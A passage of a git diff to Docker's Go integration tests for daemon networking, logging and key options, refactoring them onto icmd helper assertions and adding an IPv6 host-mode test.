TestDaemonIptablesCreate(c *check.C) { // get output from iptables with container running ipTablesSearchString := "tcp dpt:80" - ipTablesCmd := exec.Command("iptables", "-nvL") - out, _, err := runCommandWithOutput(ipTablesCmd) - if err != nil { - c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) - } - - if !strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out) - } + verifyIPTablesContains(c, ipTablesSearchString) - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) // make sure the container is not running runningOut, err := s.d.Cmd("inspect", "--format={{.State.Running}}", "top") if err != nil { - c.Fatalf("Could not inspect on container: %s, %v", out, err) + c.Fatalf("Could not inspect on container: %s, %v", runningOut, err) } if strings.TrimSpace(runningOut) != "true" { c.Fatalf("Container should have been restarted after daemon restart. Status running should have been true but was: %q", strings.TrimSpace(runningOut)) } // get output from iptables after restart - ipTablesCmd = exec.Command("iptables", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - if err != nil { - c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + verifyIPTablesContains(c, ipTablesSearchString) +} + +func verifyIPTablesContains(c *check.C, ipTablesSearchString string) { + result := icmd.RunCommand("iptables", "-nvL") + result.Assert(c, icmd.Success) + if !strings.Contains(result.Combined(), ipTablesSearchString) { + c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, result.Combined()) } +} - if !strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output after restart should have contained %q, but was %q", ipTablesSearchString, out) +func verifyIPTablesDoesNotContains(c *check.C, ipTablesSearchString string) { + result := icmd.RunCommand("iptables", "-nvL") + result.Assert(c, icmd.Success) + if strings.Contains(result.Combined(), ipTablesSearchString) { + c.Fatalf("iptables output should not have contained %q, but was %q", ipTablesSearchString, result.Combined()) } } @@ -357,9 +356,7 @@ func (s *DockerDaemonSuite) TestDaemonIPv6Enabled(c *check.C) { setupV6(c) defer teardownV6(c) - if err := s.d.StartWithBusybox("--ipv6"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--ipv6") iface, err := net.InterfaceByName("docker0") if err != nil { @@ -417,11 +414,11 @@ func (s *DockerDaemonSuite) TestDaemonIPv6Enabled(c *check.C) { func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDR(c *check.C) { // IPv6 setup is messing with local bridge address. testRequires(c, SameHostDaemon) - setupV6(c) - defer teardownV6(c) + // Delete the docker0 bridge if its left around from previous daemon. It has to be recreated with + // ipv6 enabled + deleteInterface(c, "docker0") - err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:2::/64", "--default-gateway-v6=2001:db8:2::100") - c.Assert(err, checker.IsNil, check.Commentf("Could not start daemon with busybox: %v", err)) + s.d.StartWithBusybox(c, "--ipv6", "--fixed-cidr-v6=2001:db8:2::/64", "--default-gateway-v6=2001:db8:2::100") out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "busybox:latest") c.Assert(err, checker.IsNil, check.Commentf("Could not run container: %s, %v", out, err)) @@ -445,11 +442,11 @@ func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDR(c *check.C) { func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDRAndMac(c *check.C) { // IPv6 setup is messing with local bridge address. testRequires(c, SameHostDaemon) - setupV6(c) - defer teardownV6(c) + // Delete the docker0 bridge if its left around from previous daemon. It has to be recreated with + // ipv6 enabled + deleteInterface(c, "docker0") - err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:1::/64") - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c, "--ipv6", "--fixed-cidr-v6=2001:db8:1::/64") out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "--mac-address", "AA:BB:CC:DD:EE:FF", "busybox") c.Assert(err, checker.IsNil) @@ -459,15 +456,29 @@ func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDRAndMac(c *check.C) { c.Assert(strings.Trim(out, " \r\n'"), checker.Equals, "2001:db8:1::aabb:ccdd:eeff") } +// TestDaemonIPv6HostMode checks that when the running a container with +// network=host the host ipv6 addresses are not removed +func (s *DockerDaemonSuite) TestDaemonIPv6HostMode(c *check.C) { + testRequires(c, SameHostDaemon) + deleteInterface(c, "docker0") + + s.d.StartWithBusybox(c, "--ipv6", "--fixed-cidr-v6=2001:db8:2::/64") + out, err := s.d.Cmd("run", "-itd", "--name=hostcnt", "--network=host", "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf("Could not run container: %s, %v", out, err)) + + out, err = s.d.Cmd("exec", "hostcnt", "ip", "-6", "addr", "show", "docker0") + c.Assert(err, checker.IsNil) + c.Assert(strings.Trim(out, " \r\n'"), checker.Contains, "2001:db8:2::1") +} + func (s *DockerDaemonSuite) TestDaemonLogLevelWrong(c *check.C) { - c.Assert(s.d.Start("--log-level=bogus"), check.NotNil, check.Commentf("Daemon shouldn't start with wrong log level")) + c.Assert(s.d.StartWithError("--log-level=bogus"), check.NotNil, check.Commentf("Daemon shouldn't start with wrong log level")) } func (s *DockerDaemonSuite) TestDaemonLogLevelDebug(c *check.C) { - if err := s.d.Start("--log-level=debug"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "--log-level=debug") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), `level=debug`) { c.Fatalf(`Missing level="debug" in log file:\n%s`, string(content)) } @@ -475,40 +486,36 @@ func (s *DockerDaemonSuite) TestDaemonLogLevelDebug(c *check.C) { func (s *DockerDaemonSuite) TestDaemonLogLevelFatal(c *check.C) { // we creating new daemons to create new logFile - if err := s.d.Start("--log-level=fatal"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "--log-level=fatal") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if strings.Contains(string(content), `level=debug`) { c.Fatalf(`Should not have level="debug" in log file:\n%s`, string(content)) } } func (s *DockerDaemonSuite) TestDaemonFlagD(c *check.C) { - if err := s.d.Start("-D"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "-D") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), `level=debug`) { c.Fatalf(`Should have level="debug" in log file using -D:\n%s`, string(content)) } } func (s *DockerDaemonSuite) TestDaemonFlagDebug(c *check.C) { - if err := s.d.Start("--debug"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "--debug") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), `level=debug`) { c.Fatalf(`Should have level="debug" in log file using --debug:\n%s`, string(content)) } } func (s *DockerDaemonSuite) TestDaemonFlagDebugLogLevelFatal(c *check.C) { - if err := s.d.Start("--debug", "--log-level=fatal"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "--debug", "--log-level=fatal") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), `level=debug`) { c.Fatalf(`Should have level="debug" in log file when using both --debug and --log-level=fatal:\n%s`, string(content)) } @@ -526,9 +533,7 @@ func (s *DockerDaemonSuite) TestDaemonAllocatesListeningPort(c *check.C) { cmdArgs = append(cmdArgs, "--host", fmt.Sprintf("tcp://%s:%s", hostDirective[0], hostDirective[2])) } - if err := s.d.StartWithBusybox(cmdArgs...); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c, cmdArgs...) for _, hostDirective := range listeningPorts { output, err := s.d.Cmd("run", "-p", fmt.Sprintf("%s:%s:80", hostDirective[1], hostDirective[2]), "busybox", "true") @@ -543,10 +548,8 @@ func (s *DockerDaemonSuite) TestDaemonAllocatesListeningPort(c *check.C) { func (s *DockerDaemonSuite) TestDaemonKeyGeneration(c *check.C) { // TODO: skip or update for Windows daemon os.Remove("/etc/docker/key.json") - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } - s.d.Stop() + s.d.Start(c) + s.d.Stop(c) k, err := libtrust.LoadKeyFile("/etc/docker/key.json") if err != nil { @@ -559,49 +562,18 @@ func (s *DockerDaemonSuite) TestDaemonKeyGeneration(c *check.C) { } } -func (s *DockerDaemonSuite) TestDaemonKeyMigration(c *check.C) { - // TODO: skip or update for Windows daemon - os.Remove("/etc/docker/key.json") - k1, err := libtrust.GenerateECP256PrivateKey() - if err != nil { - c.Fatalf("Error generating private key: %s", err) - } - if err := os.MkdirAll(filepath.Join(os.Getenv("HOME"), ".docker"), 0755); err != nil { - c.Fatalf("Error creating .docker directory: %s", err) - } - if err := libtrust.SaveKey(filepath.Join(os.Getenv("HOME"), ".docker", "key.json"), k1); err != nil { - c.Fatalf("Error saving private key: %s", err) - } - - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } - s.d.Stop() - - k2, err := libtrust.LoadKeyFile("/etc/docker/key.json") - if err != nil { - c.Fatalf("Error opening key file") - } - if k1.KeyID() != k2.KeyID() { - c.Fatalf("Key not migrated") - } -} - // GH#11320 - verify that the daemon exits on failure properly // Note that this explicitly tests the conflict of {-b,--bridge} and {--bip} options as the means // to get a daemon init failure; no other tests for -b/--bip conflict are therefore required func (s *DockerDaemonSuite) TestDaemonExitOnFailure(c *check.C) { //attempt to start daemon with incorrect flags (we know -b and --bip conflict) - if err := s.d.Start("--bridge", "nosuchbridge", "--bip", "1.1.1.1"); err != nil { + if err := s.d.StartWithError("--bridge", "nosuchbridge", "--bip", "1.1.1.1"); err != nil { //verify we got the right error if !strings.Contains(err.Error(), "Daemon exited") { c.Fatalf("Expected daemon not to start, got %v", err) } // look in the log and make sure we got the message that daemon is shutting down - runCmd := exec.Command("grep", "Error starting daemon", s.d.LogFileName()) - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("Expected 'Error starting daemon' message; but doesn't exist in log: %q, err: %v", out, err) - } + icmd.RunCommand("grep", "Error starting daemon", s.d.LogFileName()).Assert(c, icmd.Success) } else { //if we didn't get an error and the daemon is running, this is a failure c.Fatal("Conflicting options should cause the daemon to error out with a failure") @@ -610,34 +582,28 @@ func (s *DockerDaemonSuite) TestDaemonExitOnFailure(c *check.C) { func (s *DockerDaemonSuite) TestDaemonBridgeExternal(c *check.C) { d := s.d - err := d.Start("--bridge", "nosuchbridge") + err := d.StartWithError("--bridge", "nosuchbridge") c.Assert(err, check.NotNil, check.Commentf("--bridge option with an invalid bridge should cause the daemon to fail")) - defer d.Restart() + defer d.Restart(c) bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" _, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = d.StartWithBusybox("--bridge", bridgeName) - c.Assert(err, check.IsNil) + d.StartWithBusybox(c, "--bridge", bridgeName) ipTablesSearchString := bridgeIPNet.String() - ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) - - c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", - ipTablesSearchString, out)) + icmd.RunCommand("iptables", "-t", "nat", "-nvL").Assert(c, icmd.Expected{ + Out: ipTablesSearchString, + }) _, err = d.Cmd("run", "-d", "--name", "ExtContainer", "busybox", "top") c.Assert(err, check.IsNil) - containerIP := d.findContainerIP("ExtContainer") + containerIP := d.FindContainerIP(c, "ExtContainer") ip := net.ParseIP(containerIP) c.Assert(bridgeIPNet.Contains(ip), check.Equals, true, check.Commentf("Container IP-Address must be in the same subnet range : %s", @@ -647,46 +613,31 @@ func (s *DockerDaemonSuite) TestDaemonBridgeExternal(c *check.C) { func (s *DockerDaemonSuite) TestDaemonBridgeNone(c *check.C) { // start with bridge none d := s.d - err := d.StartWithBusybox("--bridge", "none") - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, "--bridge", "none") + defer d.Restart(c) // verify docker0 iface is not there - out, _, err := runCommandWithOutput(exec.Command("ifconfig", "docker0")) - c.Assert(err, check.NotNil, check.Commentf("docker0 should not be present if daemon started with --bridge=none")) - c.Assert(strings.Contains(out, "Device not found"), check.Equals, true) + icmd.RunCommand("ifconfig", "docker0").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + Err: "Device not found", + }) // verify default "bridge" network is not there - out, err = d.Cmd("network", "inspect", "bridge") + out, err := d.Cmd("network", "inspect", "bridge") c.Assert(err, check.NotNil, check.Commentf("\"bridge\" network should not be present if daemon started with --bridge=none")) c.Assert(strings.Contains(out, "No such network"), check.Equals, true) } -func createInterface(c *check.C, ifType string, ifName string, ipNet string) (string, error) { - args := []string{"link", "add", "name", ifName, "type", ifType} - ipLinkCmd := exec.Command("ip", args...) - out, _, err := runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - - ifCfgCmd := exec.Command("ifconfig", ifName, ipNet, "up") - out, _, err = runCommandWithOutput(ifCfgCmd) - return out, err +func createInterface(c *check.C, ifType string, ifName string, ipNet string) { + icmd.RunCommand("ip", "link", "add", "name", ifName, "type", ifType).Assert(c, icmd.Success) + icmd.RunCommand("ifconfig", ifName, ipNet, "up").Assert(c, icmd.Success) } func deleteInterface(c *check.C, ifName string) { - ifCmd := exec.Command("ip", "link", "delete", ifName) - out, _, err := runCommandWithOutput(ifCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - - flushCmd := exec.Command("iptables", "-t", "nat", "--flush") - out, _, err = runCommandWithOutput(flushCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - - flushCmd = exec.Command("iptables", "--flush") - out, _, err = runCommandWithOutput(flushCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) + icmd.RunCommand("ip", "link", "delete", ifName).Assert(c, icmd.Success) + icmd.RunCommand("iptables", "-t", "nat", "--flush").Assert(c, icmd.Success) + icmd.RunCommand("iptables", "--flush").Assert(c, icmd.Success) } func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) { @@ -707,32 +658,23 @@ func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) { bridgeIP := "192.169.1.1/24" ip, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) - err := d.StartWithBusybox("--bip", bridgeIP) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, "--bip", bridgeIP) + defer d.Restart(c) ifconfigSearchString := ip.String() - ifconfigCmd := exec.Command("ifconfig", defaultNetworkBridge) - out, _, _, err := runCommandWithStdoutStderr(ifconfigCmd) - c.Assert(err, check.IsNil) - - c.Assert(strings.Contains(out, ifconfigSearchString), check.Equals, true, - check.Commentf("ifconfig output should have contained %q, but was %q", - ifconfigSearchString, out)) + icmd.RunCommand("ifconfig", defaultNetworkBridge).Assert(c, icmd.Expected{ + Out: ifconfigSearchString, + }) ipTablesSearchString := bridgeIPNet.String() - ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) + icmd.RunCommand("iptables", "-t", "nat", "-nvL").Assert(c, icmd.Expected{ + Out: ipTablesSearchString, + }) - c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", - ipTablesSearchString, out)) - - out, err = d.Cmd("run", "-d", "--name", "test", "busybox", "top") + _, err := d.Cmd("run", "-d", "--name", "test", "busybox", "top") c.Assert(err, check.IsNil) - containerIP := d.findContainerIP("test") + containerIP := d.FindContainerIP(c, "test") ip = net.ParseIP(containerIP) c.Assert(bridgeIPNet.Contains(ip), check.Equals, true, check.Commentf("Container IP-Address must be in the same subnet range : %s", @@ -741,38 +683,23 @@ func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartWithBridgeIPChange(c *check.C) { - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } - defer s.d.Restart() - if err := s.d.Stop(); err != nil { - c.Fatalf("Could not stop daemon: %v", err) - } + s.d.Start(c) + defer s.d.Restart(c) + s.d.Stop(c) // now we will change the docker0's IP and then try starting the daemon bridgeIP := "192.169.100.1/24" _, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) - ipCmd := exec.Command("ifconfig", "docker0", bridgeIP) - stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd) - if err != nil { - c.Fatalf("failed to change docker0's IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr) - } + icmd.RunCommand("ifconfig", "docker0", bridgeIP).Assert(c, icmd.Success) - if err := s.d.Start("--bip", bridgeIP); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c, "--bip", bridgeIP) //check if the iptables contains new bridgeIP MASQUERADE rule ipTablesSearchString := bridgeIPNet.String() - ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") - out, _, err := runCommandWithOutput(ipTablesCmd) - if err != nil { - c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) - } - if !strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output should have contained new MASQUERADE rule with IP %q, but was %q", ipTablesSearchString, out) - } + icmd.RunCommand("iptables", "-t", "nat", "-nvL").Assert(c, icmd.Expected{ + Out: ipTablesSearchString, + }) } func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr(c *check.C) { @@ -781,14 +708,12 @@ func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr(c *check.C) { bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) args := []string{"--bridge", bridgeName, "--fixed-cidr", "192.169.1.0/30"} - err = d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, args...) + defer d.Restart(c) for i := 0; i < 4; i++ { cName := "Container" + strconv.Itoa(i) @@ -806,15 +731,13 @@ func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr2(c *check.C) { bridgeName := "external-bridge" bridgeIP := "10.2.2.1/16" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = d.StartWithBusybox("--bip", bridgeIP, "--fixed-cidr", "10.2.2.0/24") - c.Assert(err, check.IsNil) - defer s.d.Restart() + d.StartWithBusybox(c, "--bip", bridgeIP, "--fixed-cidr", "10.2.2.0/24") + defer s.d.Restart(c) - out, err = d.Cmd("run", "-d", "--name", "bb", "busybox", "top") + out, err := d.Cmd("run", "-d", "--name", "bb", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) defer d.Cmd("stop", "bb") @@ -832,15 +755,13 @@ func (s *DockerDaemonSuite) TestDaemonBridgeFixedCIDREqualBridgeNetwork(c *check bridgeName := "external-bridge" bridgeIP := "172.27.42.1/16" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = d.StartWithBusybox("--bridge", bridgeName, "--fixed-cidr", bridgeIP) - c.Assert(err, check.IsNil) - defer s.d.Restart() + d.StartWithBusybox(c, "--bridge", bridgeName, "--fixed-cidr", bridgeIP) + defer s.d.Restart(c) - out, err = d.Cmd("run", "-d", "busybox", "top") + out, err := d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf(out)) cid1 := strings.TrimSpace(out) defer d.Cmd("stop", cid1) @@ -855,12 +776,12 @@ func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Implicit(c *check.C) { bridgeIP := "192.169.1.1" bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP) - err := d.StartWithBusybox("--bip", bridgeIPNet) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, "--bip", bridgeIPNet) + defer d.Restart(c) expectedMessage := fmt.Sprintf("default via %s dev", bridgeIP) out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0") + c.Assert(err, checker.IsNil) c.Assert(strings.Contains(out, expectedMessage), check.Equals, true, check.Commentf("Implicit default gateway should be bridge IP %s, but default route was '%s'", bridgeIP, strings.TrimSpace(out))) @@ -877,12 +798,12 @@ func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Explicit(c *check.C) { bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP) gatewayIP := "192.169.1.254" - err := d.StartWithBusybox("--bip", bridgeIPNet, "--default-gateway", gatewayIP) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, "--bip", bridgeIPNet, "--default-gateway", gatewayIP) + defer d.Restart(c) expectedMessage := fmt.Sprintf("default via %s dev", gatewayIP) out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0") + c.Assert(err, checker.IsNil) c.Assert(strings.Contains(out, expectedMessage), check.Equals, true, check.Commentf("Explicit default gateway should be %s, but default route was '%s'", gatewayIP, strings.TrimSpace(out))) @@ -894,11 +815,10 @@ func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4ExplicitOutsideContainer deleteInterface(c, defaultNetworkBridge) // Program a custom default gateway outside of the container subnet, daemon should accept it and start - err := s.d.StartWithBusybox("--bip", "172.16.0.10/16", "--fixed-cidr", "172.16.1.0/24", "--default-gateway", "172.16.0.254") - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c, "--bip", "172.16.0.10/16", "--fixed-cidr", "172.16.1.0/24", "--default-gateway", "172.16.0.254") deleteInterface(c, defaultNetworkBridge) - s.d.Restart() + s.d.Restart(c) } func (s *DockerDaemonSuite) TestDaemonDefaultNetworkInvalidClusterConfig(c *check.C) { @@ -909,15 +829,13 @@ func (s *DockerDaemonSuite) TestDaemonDefaultNetworkInvalidClusterConfig(c *chec deleteInterface(c, defaultNetworkBridge) discoveryBackend := "consul://consuladdr:consulport/some/path" - err := s.d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend)) - c.Assert(err, checker.IsNil) + s.d.Start(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend)) // Start daemon with docker0 bridge result := icmd.RunCommand("ifconfig", defaultNetworkBridge) - c.Assert(result, icmd.Matches, icmd.Success) + result.Assert(c, icmd.Success) - err = s.d.Restart(fmt.Sprintf("--cluster-store=%s", discoveryBackend)) - c.Assert(err, checker.IsNil) + s.d.Restart(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend)) } func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) { @@ -926,9 +844,8 @@ func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) { ipStr := "192.170.1.1/24" ip, _, _ := net.ParseCIDR(ipStr) args := []string{"--ip", ip.String()} - err := d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, args...) + defer d.Restart(c) out, err := d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top") c.Assert(err, check.NotNil, @@ -936,21 +853,18 @@ func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) { c.Assert(strings.Contains(out, "Error starting userland proxy"), check.Equals, true) ifName := "dummy" - out, err = createInterface(c, "dummy", ifName, ipStr) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "dummy", ifName, ipStr) defer deleteInterface(c, ifName) _, err = d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top") c.Assert(err, check.IsNil) - ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) - + result := icmd.RunCommand("iptables", "-t", "nat", "-nvL") + result.Assert(c, icmd.Success) regex := fmt.Sprintf("DNAT.*%s.*dpt:8000", ip.String()) - matched, _ := regexp.MatchString(regex, out) + matched, _ := regexp.MatchString(regex, result.Combined()) c.Assert(matched, check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", regex, out)) + check.Commentf("iptables output should have contained %q, but was %q", regex, result.Combined())) } func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) { @@ -960,23 +874,18 @@ func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) { bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - args := []string{"--bridge", bridgeName, "--icc=false"} - err = d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - defer d.Restart() - - ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) + d.StartWithBusybox(c, "--bridge", bridgeName, "--icc=false") + defer d.Restart(c) + result := icmd.RunCommand("iptables", "-nvL", "FORWARD") + result.Assert(c, icmd.Success) regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName) - matched, _ := regexp.MatchString(regex, out) + matched, _ := regexp.MatchString(regex, result.Combined()) c.Assert(matched, check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", regex, out)) + check.Commentf("iptables output should have contained %q, but was %q", regex, result.Combined())) // Pinging another container must fail with --icc=false pingContainers(c, d, true) @@ -990,7 +899,7 @@ func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) { // But, Pinging external or a Host interface must succeed pingCmd := fmt.Sprintf("ping -c 1 %s -W 1", ip.String()) runArgs := []string{"run", "--rm", "busybox", "sh", "-c", pingCmd} - _, err = d.Cmd(runArgs...) + _, err := d.Cmd(runArgs...) c.Assert(err, check.IsNil) } @@ -1000,25 +909,20 @@ func (s *DockerDaemonSuite) TestDaemonICCLinkExpose(c *check.C) { bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - args := []string{"--bridge", bridgeName, "--icc=false"} - err = d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - defer d.Restart() - - ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) + d.StartWithBusybox(c, "--bridge", bridgeName, "--icc=false") + defer d.Restart(c) + result := icmd.RunCommand("iptables", "-nvL", "FORWARD") + result.Assert(c, icmd.Success) regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName) - matched, _ := regexp.MatchString(regex, out) + matched, _ := regexp.MatchString(regex, result.Combined()) c.Assert(matched, check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", regex, out)) + check.Commentf("iptables output should have contained %q, but was %q", regex, result.Combined())) - out, err = d.Cmd("run", "-d", "--expose", "4567", "--name", "icc1", "busybox", "nc", "-l", "-p", "4567") + out, err := d.Cmd("run", "-d", "--expose", "4567", "--name", "icc1", "busybox", "nc", "-l", "-p", "4567") c.Assert(err, check.IsNil, check.Commentf(out)) out, err = d.Cmd("run", "--link", "icc1:icc1", "busybox", "nc", "icc1", "4567") @@ -1029,21 +933,19 @@ func (s *DockerDaemonSuite) TestDaemonLinksIpTablesRulesWhenLinkAndUnlink(c *che bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = s.d.StartWithBusybox("--bridge", bridgeName, "--icc=false") - c.Assert(err, check.IsNil) - defer s.d.Restart() + s.d.StartWithBusybox(c, "--bridge", bridgeName, "--icc=false") + defer s.d.Restart(c) - _, err = s.d.Cmd("run", "-d", "--name", "child", "--publish", "8080:80", "busybox", "top") + _, err := s.d.Cmd("run", "-d", "--name", "child", "--publish", "8080:80", "busybox", "top") c.Assert(err, check.IsNil) _, err = s.d.Cmd("run", "-d", "--name", "parent", "--link", "child:http", "busybox", "top") c.Assert(err, check.IsNil) - childIP := s.d.findContainerIP("child") - parentIP := s.d.findContainerIP("parent") + childIP := s.d.FindContainerIP(c, "child") + parentIP := s.d.FindContainerIP(c, "parent") sourceRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", childIP, "--sport", "80", "-d", parentIP, "-j", "ACCEPT"} destinationRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", parentIP, "--dport", "80", "-d", childIP, "-j", "ACCEPT"} @@ -1063,9 +965,7 @@ func (s *DockerDaemonSuite) TestDaemonLinksIpTablesRulesWhenLinkAndUnlink(c *che func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) { testRequires(c, DaemonIsLinux) - if err := s.d.StartWithBusybox("--default-ulimit", "nofile=42:42", "--default-ulimit", "nproc=1024:1024"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--default-ulimit", "nofile=42:42", "--default-ulimit", "nproc=1024:1024") out, err := 